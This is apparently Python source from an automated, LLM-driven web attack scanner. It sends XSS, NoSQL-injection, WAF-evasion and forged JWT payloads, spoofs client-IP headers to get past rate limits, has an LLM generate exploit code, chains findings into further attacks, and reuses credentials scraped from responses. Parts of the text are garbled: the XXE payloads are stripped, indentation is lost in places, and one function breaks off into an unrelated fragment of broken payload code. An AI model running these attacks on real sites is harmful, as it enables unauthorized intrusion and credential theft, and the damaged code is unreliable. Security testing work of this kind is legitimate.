# WAF information
if self._waf_result and self._waf_result.detected_wafs:
waf_names = [w.get('name', '?') if isinstance(w, dict) else str(w)
for w in self._waf_result.detected_wafs]
parts.append(f"\nWAF DETECTED: {', '.join(waf_names)}")
if self.waf_detector:
try:
bypasses = self.waf_detector.get_bypass_techniques(self._waf_result)
if bypasses:
parts.append(f"WAF BYPASS TECHNIQUES: {', '.join(bypasses[:5])}")
except Exception:
pass
# Parameter analysis
if self.param_analyzer and params:
try:
param_dict = {p: "" for p in params[:5]}
ranked = self.param_analyzer.rank_parameters(param_dict)
param_info = []
for name, score, vulns in ranked[:5]:
param_info.append(f" {name}: risk={score:.1f}, likely_vulns={vulns[:3]}")
if param_info:
parts.append(f"\nPARAMETER RISK ANALYSIS:")
parts.extend(param_info)
except Exception:
pass
# Memory: what was already tested
tested_payloads = []
for p in params[:3]:
if self.memory.was_tested(url, p, vuln_type) or self.memory.was_tested(base_url, p, vuln_type):
tested_payloads.append(f" {p}: already tested (skip)")
if tested_payloads:
parts.append(f"\nPREVIOUSLY TESTED (from memory):")
parts.extend(tested_payloads)
# RAG context
if self.rag_engine:
try:
rag_ctx = self._get_rag_testing_context(vuln_type, url)
if rag_ctx:
parts.append(f"\nRAG CONTEXT (historical patterns):")
parts.append(rag_ctx[:500])
except Exception:
pass
return "\n".join(parts)
async def _execute_ai_planned_tests(
self, tests: List[Dict], default_url: str, default_method: str
) -> List[Dict]:
"""Execute AI-planned test cases, return results with full responses.
Reuses _make_request() and _make_request_with_injection() for HTTP calls.
"""
results = []
for test in tests[:5]:
if self.is_cancelled():
break
test_url = test.get("url", default_url)
test_method = test.get("method", default_method).upper()
test_params = test.get("params", {})
test_headers = test.get("headers", {})
test_body = test.get("body", "")
test_name = test.get("name", "unnamed")
injection_point = test.get("injection_point", "parameter")
content_type = test.get("content_type", "")
try:
start_time = asyncio.get_event_loop().time()
if injection_point == "header" and test_headers:
# Use header injection for header-based tests
header_name = list(test_headers.keys())[0] if test_headers else "X-Test"
payload = test_headers.get(header_name, "")
resp = await self._make_request_with_injection(
test_url, test_method, payload,
injection_point="header", header_name=header_name
)
elif injection_point == "body" and test_body:
# Body injection
resp = await self._make_request_with_injection(
test_url, "POST", test_body,
injection_point="body", param_name="data"
)
elif test_params:
# Parameter injection (default)
resp = await self._make_request(test_url, test_method, test_params)
else:
# Plain request
resp = await self._make_request(test_url, test_method, {})
elapsed = asyncio.get_event_loop().time() - start_time
if resp:
# Extract the payload used for finding creation
payload_used = ""
param_used = ""
if test_params:
for k, v in test_params.items():
if v and len(str(v)) > 3:
payload_used = str(v)
param_used = k
break
result = {
"test_name": test_name,
"name": test_name,
"url": test_url,
"method": test_method,
"status": resp.get("status", 0),
"headers": {k: v for k, v in list(resp.get("headers", {}).items())[:15]},
"body_preview": resp.get("body", "")[:1500],
"body_length": len(resp.get("body", "")),
"response_time": round(elapsed, 3),
"payload": payload_used,
"param": param_used,
}
results.append(result)
else:
results.append({
"test_name": test_name,
"name": test_name,
"url": test_url,
"method": test_method,
"status": 0,
"error": "No response",
"body_preview": "",
"body_length": 0,
})
except Exception as e:
results.append({
"test_name": test_name,
"name": test_name,
"url": test_url,
"error": str(e),
"status": 0,
"body_preview": "",
"body_length": 0,
})
return results
async def _ai_test_fallback(self, user_prompt: str):
"""Fallback testing when LLM is not available - uses keyword detection"""
await self.log("info", f" Running fallback tests for: {user_prompt}")
prompt_lower = user_prompt.lower()
# Define fallback test mappings
fallback_tests = {
"xxe": self._test_xxe_fallback,
"xml": self._test_xxe_fallback,
"race": self._test_race_condition_fallback,
"rate": self._test_rate_limit_fallback,
"bola": self._test_idor_fallback,
"idor": self._test_idor_fallback,
"bfla": self._test_bfla_fallback,
"jwt": self._test_jwt_fallback,
"graphql": self._test_graphql_fallback,
"nosql": self._test_nosql_fallback,
"waf": self._test_waf_bypass_fallback,
"csp": self._test_csp_bypass_fallback,
}
tests_run = False
for keyword, test_func in fallback_tests.items():
if keyword in prompt_lower:
await test_func()
tests_run = True
if not tests_run:
await self.log("warning", " No fallback test matched. LLM required for this test type.")
async def _test_xxe_fallback(self):
"""Test for XXE without LLM"""
await self.log("info", " Testing XXE (XML External Entity)...")
xxe_payloads = [
']>&xxe; ',
']>&xxe; ',
'%xxe;]> ',
]
for endpoint in [self.target] + [_get_endpoint_url(ep) for ep in self.recon.endpoints[:5]]:
if not endpoint:
continue
for payload in xxe_payloads:
try:
headers = {"Content-Type": "application/xml"}
async with self.session.post(endpoint, data=payload, headers=headers) as resp:
body = await resp.text()
if "root:" in body or "daemon:" in body or "ENTITY" in body.lower():
finding = Finding(
id=hashlib.md5(f"xxe{endpoint}".encode()).hexdigest()[:8],
title="XXE (XML External Entity) Injection",
severity="critical",
vulnerability_type="xxe",
cvss_score=9.1,
cvss_vector="CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
cwe_id="CWE-611",
description="XML External Entity injection allows reading local files and potentially SSRF.",
affected_endpoint=endpoint,
payload=payload[:200],
evidence=body[:500],
remediation="Disable external entity processing in XML parsers. Use JSON instead of XML where possible.",
ai_verified=False
)
await self._add_finding(finding)
await self.log("warning", f" [FOUND] XXE at {endpoint[:50]}")
return
except:
pass
async def _test_race_condition_fallback(self):
    """Probe for race conditions without LLM help.

    Fires 10 concurrent GETs at candidate endpoints (form actions first,
    then recon endpoints) and logs endpoints whose concurrent responses
    disagree on status code - a weak race-condition indicator.
    """
    await self.log("info", " Testing Race Conditions...")
    # Find form endpoints that might be vulnerable
    target_endpoints = []
    for form in self.recon.forms[:3]:
        if isinstance(form, dict):
            action = form.get("action", "")
            if action:
                target_endpoints.append(action)
    if not target_endpoints:
        target_endpoints = [_get_endpoint_url(ep) for ep in self.recon.endpoints[:3] if _get_endpoint_url(ep)]

    async def _probe(url: str) -> int:
        # Enter AND exit the response context so the connection is released.
        # (The old code called __aenter__ without __aexit__, leaking
        # connections from the aiohttp pool.)
        async with self.session.get(url) as resp:
            await resp.read()
            return resp.status

    for endpoint in target_endpoints:
        try:
            results = await asyncio.gather(
                *(_probe(endpoint) for _ in range(10)), return_exceptions=True
            )
            statuses = [r for r in results if isinstance(r, int)]
            # Divergent statuses under concurrency hint at racy server state.
            if len(set(statuses)) > 1:
                await self.log("info", f" Inconsistent responses detected at {endpoint[:50]} - potential race condition")
        except Exception:
            continue
async def _test_rate_limit_fallback(self):
    """Probe for missing or bypassable rate limiting without LLM help.

    For each common client-IP spoofing header, sends 20 requests with a
    rotating spoofed IP. If the server never answers 429, rate limiting
    is likely absent or bypassable via that header.
    """
    await self.log("info", " Testing Rate Limiting...")
    # Headers commonly trusted by reverse proxies for the client IP.
    # Fix: the old loop overwrote X-Forwarded-For regardless of which
    # bypass header was under test, so only one header was ever exercised.
    spoof_headers = [
        "X-Forwarded-For",
        "X-Real-IP",
        "X-Originating-IP",
        "X-Client-IP",
        "True-Client-IP",
    ]
    for endpoint in [self.target]:
        for header_name in spoof_headers:
            try:
                limited = False
                for i in range(20):
                    # Rotate the spoofed IP on the header being tested.
                    headers = {header_name: f"192.168.1.{i}"}
                    async with self.session.get(endpoint, headers=headers) as resp:
                        if resp.status == 429:
                            await self.log("info", f" Rate limit hit at request {i}")
                            limited = True
                            break
                if not limited:
                    await self.log("warning", f" [POTENTIAL] No rate limiting detected with header bypass")
            except Exception:
                continue
async def _test_idor_fallback(self):
    """Probe for IDOR/BOLA without LLM help.

    Rewrites each known parameter with boundary object IDs and checks
    whether the server still returns substantive 200 responses. Results
    are only logged at debug level - object ownership cannot be verified
    from here, so no finding is raised.
    """
    await self.log("info", " Testing IDOR/BOLA...")
    # Find endpoints with numeric parameters
    for param, endpoints in self.recon.parameters.items():
        for endpoint in endpoints[:2]:
            url = _get_endpoint_url(endpoint) if isinstance(endpoint, dict) else endpoint
            if not url:
                continue
            # Boundary / adjacent IDs: neighbours, zero, negative, huge.
            for test_id in ["1", "2", "0", "-1", "9999999"]:
                try:
                    parsed = urlparse(url)
                    test_url = f"{parsed.scheme}://{parsed.netloc}{parsed.path}?{param}={test_id}"
                    async with self.session.get(test_url) as resp:
                        if resp.status == 200:
                            body = await resp.text()
                            if len(body) > 100:
                                await self.log("debug", f" Got response for {param}={test_id}")
                except Exception:
                    # Narrowed from bare except so task cancellation propagates.
                    continue
async def _test_bfla_fallback(self):
    """Probe for BFLA (Broken Function Level Authorization) without LLM help.

    Requests common admin/management paths with the current (unprivileged)
    session and flags any that answer 200 instead of 401/403.
    """
    await self.log("info", " Testing BFLA (Broken Function Level Authorization)...")
    admin_paths = ["/admin", "/api/admin", "/api/v1/admin", "/manage", "/dashboard", "/internal"]
    for path in admin_paths:
        try:
            url = urljoin(self.target, path)
            async with self.session.get(url) as resp:
                if resp.status == 200:
                    await self.log("warning", f" [POTENTIAL] Admin endpoint accessible: {url}")
                elif resp.status in (401, 403):
                    await self.log("debug", f" Protected: {url}")
        except Exception:
            # Narrowed from bare except so task cancellation propagates.
            continue
async def _test_jwt_fallback(self):
    """Probe for JWT handling weaknesses without LLM help.

    Sends forged tokens as Bearer credentials; a 200 response suggests
    the signature/algorithm is not being validated server-side.
    """
    await self.log("info", " Testing JWT vulnerabilities...")
    # Try none algorithm and other JWT attacks
    jwt_tests = [
        # {"alg":"none"} token with an empty signature segment
        "eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6ImFkbWluIiwiaWF0IjoxNTE2MjM5MDIyfQ.",
        # HS256 token with a bogus signature ("test")
        "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6ImFkbWluIiwiaWF0IjoxNTE2MjM5MDIyfQ.test",
    ]
    for endpoint in [self.target] + [_get_endpoint_url(ep) for ep in self.recon.endpoints[:3]]:
        if not endpoint:
            continue
        for token in jwt_tests:
            try:
                headers = {"Authorization": f"Bearer {token}"}
                async with self.session.get(endpoint, headers=headers) as resp:
                    if resp.status == 200:
                        await self.log("debug", f" JWT accepted at {endpoint[:50]}")
            except Exception:
                # Narrowed from bare except so task cancellation propagates.
                continue
async def _test_graphql_fallback(self):
    """Probe for exposed GraphQL endpoints without LLM help.

    POSTs an introspection query to common GraphQL paths and records a
    low-severity finding when the schema is returned (introspection on).
    """
    await self.log("info", " Testing GraphQL...")
    graphql_endpoints = ["/graphql", "/api/graphql", "/v1/graphql", "/query"]
    introspection_query = '{"query": "{ __schema { types { name } } }"}'
    for path in graphql_endpoints:
        try:
            url = urljoin(self.target, path)
            headers = {"Content-Type": "application/json"}
            async with self.session.post(url, data=introspection_query, headers=headers) as resp:
                if resp.status == 200:
                    body = await resp.text()
                    if "__schema" in body or "types" in body:
                        finding = Finding(
                            id=hashlib.md5(f"graphql{url}".encode()).hexdigest()[:8],
                            title="GraphQL Introspection Enabled",
                            severity="low",
                            vulnerability_type="graphql_introspection",
                            cvss_score=3.0,
                            cwe_id="CWE-200",
                            description="GraphQL introspection is enabled, exposing the entire API schema.",
                            affected_endpoint=url,
                            evidence=body[:500],
                            remediation="Disable introspection in production environments.",
                            ai_verified=False
                        )
                        await self._add_finding(finding)
                        await self.log("warning", f" [FOUND] GraphQL introspection at {url}")
        except Exception:
            # Narrowed from bare except so task cancellation propagates.
            continue
async def _test_nosql_fallback(self):
    """Probe for NoSQL (MongoDB-style) injection without LLM help.

    Injects operator payloads ($gt, $ne, $where) into known parameters
    and logs (debug only) when the server accepts them with a
    substantive 200 response - acceptance alone is not proof, so no
    finding is raised here.
    """
    await self.log("info", " Testing NoSQL injection...")
    nosql_payloads = [
        '{"$gt": ""}',
        '{"$ne": null}',
        '{"$where": "1==1"}',
        "[$gt]=&",
        '{"username": {"$gt": ""}, "password": {"$gt": ""}}',
    ]
    for param, endpoints in list(self.recon.parameters.items())[:5]:
        for endpoint in endpoints[:2]:
            url = _get_endpoint_url(endpoint) if isinstance(endpoint, dict) else endpoint
            if not url:
                continue
            for payload in nosql_payloads:
                try:
                    # Payload goes in raw (not percent-encoded), matching the
                    # original behaviour.
                    test_url = f"{url.split('?')[0]}?{param}={payload}"
                    async with self.session.get(test_url) as resp:
                        body = await resp.text()
                        if resp.status == 200 and len(body) > 100:
                            await self.log("debug", f" NoSQL payload accepted: {param}={payload[:30]}")
                except Exception:
                    # Narrowed from bare except so task cancellation propagates.
                    continue
async def _test_waf_bypass_fallback(self):
    """Probe WAF filtering with progressively evasive XSS payloads.

    Sends a plain payload plus common evasions (tag nesting, event
    handler, double/single URL encoding) and logs whether each is
    blocked (403) or reflected unfiltered (potential bypass).
    """
    await self.log("info", " Testing WAF bypass techniques...")
    # NOTE(review): the previous payload list had lost its HTML markup;
    # these are the standard evasion variants the inline comments described.
    bypass_payloads = [
        "<script>alert(1)</script>",                      # Original
        "<scr<script>ipt>alert(1)</scr</script>ipt>",     # Nested
        "<img src=x onerror=alert(1)>",                   # Event handler
        "%253Cscript%253Ealert(1)%253C%252Fscript%253E",  # Double encoding
        "%3Cscript%3Ealert(1)%3C/script%3E",              # URL encoded
    ]
    for endpoint in [self.target]:
        for payload in bypass_payloads:
            try:
                test_url = f"{endpoint}?test={payload}"
                async with self.session.get(test_url) as resp:
                    if resp.status == 403:
                        await self.log("debug", f" WAF blocked: {payload[:30]}")
                    elif resp.status == 200:
                        body = await resp.text()
                        if payload in body or "alert(1)" in body:
                            await self.log("warning", f" [POTENTIAL] WAF bypass: {payload[:30]}")
            except Exception:
                # Narrowed from bare except so task cancellation propagates.
                continue
async def _test_csp_bypass_fallback(self):
    """Audit the Content-Security-Policy header without LLM help.

    Fetches the target once and raises a medium-severity finding for
    well-known CSP weaknesses (unsafe-inline, unsafe-eval, wildcard
    sources, data: URIs). Logs a warning when no CSP header is present.
    """
    await self.log("info", " Testing CSP bypass...")
    try:
        async with self.session.get(self.target) as resp:
            csp = resp.headers.get("Content-Security-Policy", "")
            if not csp:
                await self.log("warning", " No CSP header found")
                return
            # Check for weak CSP
            weaknesses = []
            if "unsafe-inline" in csp:
                weaknesses.append("unsafe-inline allows inline scripts")
            if "unsafe-eval" in csp:
                weaknesses.append("unsafe-eval allows eval()")
            if "*" in csp:
                weaknesses.append("Wildcard (*) in CSP is too permissive")
            if "data:" in csp:
                weaknesses.append("data: URI scheme can be abused")
            if weaknesses:
                finding = Finding(
                    id=hashlib.md5(f"csp{self.target}".encode()).hexdigest()[:8],
                    title="Weak Content Security Policy",
                    severity="medium",
                    vulnerability_type="csp_bypass",
                    cvss_score=4.0,
                    cwe_id="CWE-693",
                    description=f"CSP has weaknesses: {'; '.join(weaknesses)}",
                    affected_endpoint=self.target,
                    evidence=f"CSP: {csp[:500]}",
                    remediation="Remove unsafe-inline, unsafe-eval, wildcards, and data: from CSP.",
                    ai_verified=False
                )
                await self._add_finding(finding)
                await self.log("warning", f" [FOUND] Weak CSP: {', '.join(weaknesses)}")
    except Exception:
        # Narrowed from bare except so task cancellation propagates.
        pass
async def _ai_test_vulnerability(self, vuln_type: str) -> None:
    """Wrapper for backwards compatibility - now uses AI dynamic test"""
    # Kept so older call sites keep working; all logic lives in _ai_dynamic_test.
    await self._ai_dynamic_test(vuln_type)
async def _execute_ai_test(self, test: Dict, vuln_type: str):
    """Execute one AI-generated test case against the target.

    Sends the request described by ``test`` (url/method/headers/params),
    then - when an LLM is available and the test defines a ``check`` -
    asks the model whether the response indicates the vulnerability.
    AI-reported evidence is rejected unless it is grounded in the actual
    response body (anti-hallucination guard).

    Args:
        test: AI-generated test spec with keys url, method, headers,
            params, check (all optional).
        vuln_type: Vulnerability type label being tested.
    """
    if not self.session:
        return
    try:
        url = test.get("url", self.target)
        method = test.get("method", "GET").upper()
        headers = test.get("headers", {})
        params = test.get("params", {})
        check = test.get("check", "")
        # Capture status/body/headers while the response context is open;
        # the old code read resp.status after the `async with` had exited.
        if method == "GET":
            async with self.session.get(url, params=params, headers=headers) as resp:
                status = resp.status
                body = await resp.text()
                response_headers = dict(resp.headers)
        else:
            async with self.session.post(url, data=params, headers=headers) as resp:
                status = resp.status
                body = await resp.text()
                response_headers = dict(resp.headers)
        # Use AI to analyze if vulnerability exists
        if self.llm.is_available() and check:
            # RAG: Get reasoning context for better AI analysis
            rag_testing_ctx = self._get_rag_testing_context(vuln_type, url) if (self.rag_engine or self.few_shot_selector) else ""
            # Playbook methodology context for this vuln type
            pb_ctx = getattr(self, '_current_playbook_context', '') or ''
            analysis_prompt = f"""Analyze this response for {vuln_type} vulnerability.
Check for: {check}
Response status: {status}
Response headers: {dict(list(response_headers.items())[:10])}
Response body (first 1000 chars): {body[:1000]}
{rag_testing_ctx}{pb_ctx}
Is this vulnerable? Respond with:
VULNERABLE: <evidence>
or
NOT_VULNERABLE: <reason>"""
            result = await self.llm.generate(analysis_prompt, self._get_enhanced_system_prompt("verification"))
            verdict = result.upper()
            # Fix: the old check `"VULNERABLE:" in result.upper()` also
            # matched "NOT_VULNERABLE:" answers, producing false positives.
            if "VULNERABLE:" in verdict and "NOT_VULNERABLE" not in verdict:
                evidence = result.split(":", 1)[1].strip() if ":" in result else result
                # Anti-hallucination: verify AI evidence in actual response
                if not self._evidence_in_response(evidence, body):
                    await self.log("debug", f" [REJECTED] AI evidence not grounded in response for {vuln_type}")
                    return
                mapped = self._map_vuln_type(vuln_type)
                finding = Finding(
                    id=hashlib.md5(f"{vuln_type}{url}ai".encode()).hexdigest()[:8],
                    title=self.vuln_registry.get_title(mapped) or f"AI-Detected {vuln_type.title()} Vulnerability",
                    severity=self._get_severity(vuln_type),
                    vulnerability_type=vuln_type,
                    cvss_score=self._get_cvss_score(vuln_type),
                    cvss_vector=self._get_cvss_vector(vuln_type),
                    cwe_id=self.vuln_registry.get_cwe_id(mapped) or "",
                    description=self.vuln_registry.get_description(mapped) or f"AI analysis detected potential {vuln_type} vulnerability.",
                    affected_endpoint=url,
                    evidence=evidence[:500],
                    remediation=self.vuln_registry.get_remediation(mapped) or f"Review and remediate the {vuln_type} vulnerability.",
                    ai_verified=True
                )
                await self._add_finding(finding)
                await self.log("warning", f" [AI FOUND] {vuln_type} at {url[:50]}")
    except Exception as e:
        await self.log("debug", f" AI test execution error: {e}")
async def _test_single_param(self, base_url: str, param: str, payload: str, vuln_type: str):
    """Send one payload against one query parameter and judge the result.

    Rebuilds the URL with only the injected parameter, captures the full
    response, runs the verifier, and - on a positive - routes the
    candidate through the ValidationJudge pipeline before recording it.
    """
    if not self.session:
        return
    try:
        pieces = urlparse(base_url)
        probe_url = f"{pieces.scheme}://{pieces.netloc}{pieces.path}?{param}={payload}"
        async with self.session.get(probe_url) as resp:
            page = await resp.text()
            # Snapshot everything the verifier/judge needs while the
            # response is still open.
            response_data = {
                "status": resp.status,
                "body": page,
                "headers": dict(resp.headers),
                "url": str(resp.url),
                "method": "GET",
                "content_type": resp.headers.get("Content-Type", ""),
            }
        is_vuln, evidence = await self._verify_vulnerability(vuln_type, payload, response_data)
        if not is_vuln:
            return
        await self.log("warning", f" [POTENTIAL] {vuln_type.upper()} found in {param}")
        # Run through ValidationJudge pipeline
        judged = await self._judge_finding(
            vuln_type, probe_url, param, payload, evidence, response_data
        )
        if judged:
            await self._add_finding(judged)
    except Exception as e:
        await self.log("debug", f" Test error: {e}")
async def log_script(self, level: str, message: str) -> None:
    """Log a script/tool message"""
    # Thin alias over log(); exists so callers can signal message origin.
    await self.log(level, message)
async def log_llm(self, level: str, message: str):
    """Log an LLM/AI message - prefixed with [AI] or [LLM]."""
    # Prepend the [AI] tag unless the caller already tagged the message.
    prefixed = message if message.startswith(("[AI]", "[LLM]")) else f"[AI] {message}"
    await self.log(level, prefixed)
async def _add_finding(self, finding: Finding) -> None:
    """Add a finding through memory (dedup + bounded + evidence check).

    Post-acceptance, runs a best-effort enrichment pipeline (each stage
    is wrapped in try/except so one failure never loses the finding):
    AI exploitation validation, PoC generation + replay validation,
    cross-scan learning, RAG reasoning-trace capture, screenshot,
    chain-engine follow-up tests, strategy propagation, reasoning-engine
    reflection, credential harvesting, and finally the UI callback.
    """
    added = self.memory.add_finding(finding)
    if not added:
        # Memory refused it - distinguish dedup from evidence/capacity rejection.
        reason = "duplicate" if self.memory.has_finding_for(
            finding.vulnerability_type, finding.affected_endpoint, finding.parameter
        ) else "rejected by memory (missing evidence, speculative, or at capacity)"
        await self.log("info", f" [SKIP] {finding.title} - {reason}")
        return
    await self.log("warning", f" [FOUND] {finding.title} - {finding.severity}")
    # AI exploitation validation
    try:
        validation = await self._ai_validate_exploitation(asdict(finding))
        if validation:
            if validation.get("false_positive_risk") in ("medium", "high"):
                await self.log("warning", f" [AI] False positive risk: {validation['false_positive_risk']} for {finding.title}")
            if validation.get("exploitation_notes"):
                # Fold the AI's notes into the stored evidence string.
                finding.evidence = f"{finding.evidence or ''} | [AI Validation] {validation['exploitation_notes']}"
                await self.log("info", f" [AI] Exploitation notes: {validation['exploitation_notes'][:100]}")
    except Exception:
        pass
    # Generate PoC code — prefer exploit_generator (AI-enhanced), fallback to poc_generator
    if not finding.poc_code:
        poc_generated = False
        if self.exploit_generator and self.llm.is_available():
            try:
                exploit_result = await self.exploit_generator.generate(
                    finding, self.recon, self.llm, self.token_budget,
                    waf_detected=bool(self._waf_result and self._waf_result.detected_wafs),
                )
                if exploit_result and getattr(exploit_result, "poc_code", ""):
                    finding.poc_code = exploit_result.poc_code
                    poc_generated = True
            except Exception:
                pass
        if not poc_generated:
            # Template-based fallback generator (no LLM required).
            try:
                finding.poc_code = self.poc_generator.generate(
                    finding.vulnerability_type,
                    finding.affected_endpoint,
                    finding.parameter,
                    finding.payload,
                    finding.evidence,
                    method=finding.request.split()[0] if finding.request else "GET"
                )
            except Exception:
                pass
    # Validate the generated PoC by replaying it
    if finding.poc_code and self.poc_validator_engine:
        try:
            validation = await self.poc_validator_engine.validate(
                finding.poc_code, finding, self.request_engine
            )
            if validation and hasattr(validation, "valid"):
                if not validation.valid:
                    await self.log("debug", f" [POC] Validation failed: {validation.actual_result}")
        except Exception:
            pass
    # Record success in execution history for cross-scan learning
    if self.execution_history:
        try:
            self.execution_history.record(
                self.recon.technologies,
                finding.vulnerability_type,
                finding.affected_endpoint,
                True,
                finding.evidence or ""
            )
        except Exception:
            pass
    # RAG: Record reasoning trace for future retrieval (pseudo-fine-tuning)
    if self.reasoning_memory and HAS_RAG:
        try:
            trace = ReasoningTrace(
                vuln_type=finding.vulnerability_type,
                technology=", ".join(self.recon.technologies[:3]) if self.recon.technologies else "unknown",
                endpoint_pattern=self._normalize_endpoint_for_rag(finding.affected_endpoint),
                parameter=finding.parameter or "",
                reasoning_steps=[
                    f"Tested {finding.vulnerability_type} on {finding.affected_endpoint}",
                    f"Parameter: {finding.parameter or 'N/A'}",
                    f"Payload: {finding.payload or 'N/A'}",
                    f"Evidence: {(finding.evidence or '')[:200]}",
                    f"Confidence: {getattr(finding, 'confidence_score', 'N/A')}",
                ],
                payload_used=finding.payload or "",
                evidence_summary=(finding.evidence or "")[:300],
                confidence=getattr(finding, 'confidence_score', 80) / 100.0,
                scan_target=self.target
            )
            self.reasoning_memory.record_success(trace)
            # Also index in RAG engine for semantic retrieval
            if self.rag_engine:
                self.rag_engine.index_reasoning_trace(asdict(trace))
        except Exception:
            pass
    # Capture screenshot for the confirmed finding
    await self._capture_finding_screenshot(finding)
    # Chain engine: derive new targets from this finding
    if self.chain_engine:
        try:
            derived = await self.chain_engine.on_finding(finding, self.recon, self.memory)
            if derived:
                await self.log("info", f" [CHAIN] {len(derived)} derived targets from {finding.vulnerability_type}")
                for chain_target in derived[:5]:  # Limit to 5 derived targets per finding
                    await self.log("info", f" [CHAIN] Testing {chain_target.vuln_type} → {chain_target.url[:50]}")
                    try:
                        chain_finding = await self._test_vulnerability_type(
                            chain_target.url,
                            chain_target.vuln_type,
                            "GET",
                            [chain_target.param] if chain_target.param else ["id"]
                        )
                        if chain_finding:
                            # Tag the derived finding with its parent for traceability;
                            # recursion re-enters this method for the chained finding.
                            chain_finding.evidence = f"{chain_finding.evidence or ''} [CHAIN from {finding.id}: {finding.vulnerability_type}]"
                            await self._add_finding(chain_finding)
                    except Exception as e:
                        await self.log("debug", f" [CHAIN] Test failed: {e}")
        except Exception as e:
            await self.log("debug", f" [CHAIN] Engine error: {e}")
    # Strategy propagation: generate related test tasks from finding patterns
    if self.strategy:
        try:
            propagated = self.strategy.propagate_finding_pattern(
                finding, self.recon.endpoints
            )
            if propagated:
                await self.log("info", f" [STRATEGY] Propagated {len(propagated)} "
                               f"related test targets from {finding.vulnerability_type}")
                # Queue propagated targets into endpoint queue if available
                if hasattr(self, '_endpoint_queue'):
                    for task in propagated[:10]:
                        await self._endpoint_queue.put({"url": task["url"]})
        except Exception as e:
            await self.log("debug", f" [STRATEGY] Propagation error: {e}")
    # Reasoning engine: reflect on confirmed finding for strategy adaptation
    if self.reasoning_engine:
        try:
            reflection = await self.reasoning_engine.reflect(
                action_taken=f"confirmed_{finding.vulnerability_type}",
                result_observed={
                    "endpoint": finding.affected_endpoint,
                    "param": finding.parameter or "",
                    "severity": finding.severity,
                    "vuln_type": finding.vulnerability_type,
                }
            )
            if reflection and reflection.learned_pattern:
                await self.log("info", f" [REASONING] Learned: {reflection.learned_pattern}")
        except Exception:
            pass
    # Feed discovered credentials to auth manager
    if self.auth_manager and finding.vulnerability_type in (
        "information_disclosure", "api_key_exposure", "default_credentials",
        "weak_password", "hardcoded_secrets"
    ):
        try:
            # Loose key=value / key: value secret pattern over the evidence text.
            cred_pattern = re.findall(
                r'(?:password|passwd|pwd|pass|api_key|apikey|token|secret)[=:"\s]+([^\s"\'&,;]{4,})',
                finding.evidence or "", re.IGNORECASE
            )
            for cred_val in cred_pattern[:3]:
                self.auth_manager.add_credentials(
                    username="discovered", password=cred_val,
                    role="user", source="discovered"
                )
                await self.log("info", f" [AUTH] Discovered credential fed to auth manager")
        except Exception:
            pass
    # Notify the UI/reporting layer last, once the finding is fully enriched.
    if self.finding_callback:
        try:
            await self.finding_callback(asdict(finding))
        except Exception as e:
            print(f"Finding callback error: {e}")
async def _double_check_findings(self):
"""Re-validate all confirmed findings by re-sending payloads.
Uses a different validation approach than the original test:
- Re-sends the exact payload and verifies the response
- Compares with a benign request (negative control)
- Downgrades findings that fail re-validation
"""
if not self.findings:
return
await self.log("info", f" Double-checking {len(self.findings)} findings...")
demoted = 0
for i, finding in enumerate(list(self.findings)):
if self.is_cancelled():
break
endpoint = finding.affected_endpoint
payload = finding.payload
param = finding.parameter
if not endpoint or not payload:
finding.evidence = (finding.evidence or "") + " [DOUBLE-CHECK: skipped (no payload)]"
continue
try:
# 1. Re-send the attack payload
method = "GET"
if finding.request:
parts = finding.request.split()
if parts:
method = parts[0].upper()
attack_resp = await self._make_request(
endpoint, method=method,
params={param: payload} if method == "GET" and param else None,
data={param: payload} if method == "POST" and param else None,
)
# 2. Send benign value for comparison
benign_resp = await self._make_request(
endpoint, method=method,
params={param: "test123"} if method == "GET" and param else None,
data={param: "test123"} if method == "POST" and param else None,
)
if not attack_resp:
finding.evidence = (finding.evidence or "") + " [DOUBLE-CHECK: no response]"
continue
attack_status = attack_resp.get("status", 0)
attack_body = attack_resp.get("body", "")
benign_status = benign_resp.get("status", 0) if benign_resp else 0
benign_body = benign_resp.get("body", "") if benign_resp else ""
# Check if payload is still reflected/executed
still_valid = False
# Check payload reflection
if payload in attack_body and payload not in benign_body:
still_valid = True
# Check for vulnerability-specific markers
vuln_type = finding.vulnerability_type
if vuln_type in ("sqli_error", "sqli_union", "sqli_blind"):
sql_markers = ["sql", "syntax", "mysql", "postgresql", "sqlite", "oracle", "mssql"]
if any(m in attack_body.lower() for m in sql_markers):
still_valid = True
elif vuln_type == "command_injection":
if any(m in attack_body for m in ["uid=", "root:", "www-data", "bin/"]):
still_valid = True
elif vuln_type == "ssti":
# Check for evaluated expressions
if "49" in attack_body and "49" not in benign_body:
still_valid = True
elif vuln_type in ("xss_reflected", "xss_stored"):
if "",
f"
",
])
if context == "js_template_literal":
payloads.extend(["${alert(1)}", "${alert(document.domain)}"])
if context == "href":
payloads.extend([
"javascript:alert(1)",
"javascript:alert(document.domain)",
"javascript:alert(1)",
])
if context in ("textarea", "title"):
tag = "textarea" if context == "textarea" else "title"
payloads.extend([
f"{tag}>",
f"{tag}>
",
])
if context == "attribute_double":
payloads.extend(['" onfocus=alert(1) autofocus x="', '">